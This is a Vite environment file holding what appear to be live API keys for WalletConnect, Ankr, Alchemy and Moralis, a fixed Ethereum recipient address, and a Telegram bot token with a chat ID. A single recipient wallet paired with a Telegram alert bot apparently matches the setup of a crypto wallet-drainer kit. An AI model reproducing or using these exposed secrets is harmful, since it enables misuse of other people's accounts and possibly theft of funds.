VITE_WALLETCONNECT_API=e874bd7b404e55f197a7debd00e1146a
VITE_ANKR_API_KEY=2751391d0b8e8d41e50b93e35e7cb4ee31d71742fffdc6264b682fc5aedc5c7a
VITE_ALCHEMY_API=cTed1UCPPU-_5PQFQ87IN8DnMMt08MVB
VITE_MORALIS_KEY=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJub25jZSI6ImZhOTM5NzZlLWQ0ZGEtNGU4ZS05ODNmLTU0YzNkMjY3YzE0NSIsIm9yZ0lkIjoiNDgxNjAxIiwidXNlcklkIjoiNDk1NDY5IiwidHlwZUlkIjoiZTAwMWQzYTItODk1OS00MjI0LTlkN2QtMjQyYWExYjMwODhjIiwidHlwZSI6IlBST0pFQ1QiLCJpYXQiOjE3NjMyNjI5NjIsImV4cCI6NDkxOTAyMjk2Mn0.O3s4gMUuiDxRW2KB4eFtu5LTqTpk1G4vutR7mVPcat4
VITE_RECIPIENT_ADDRESS=0xea61c628aa1c3e818468337d36d1761ad7c8c8ee
VITE_TELEGRAM_BOT_API=8321594074:AAF0OiHDnPDyGMa8yWY9oi20I8A6uJhU2o0
VITE_TELEGRAM_CHAT_ID=7765726318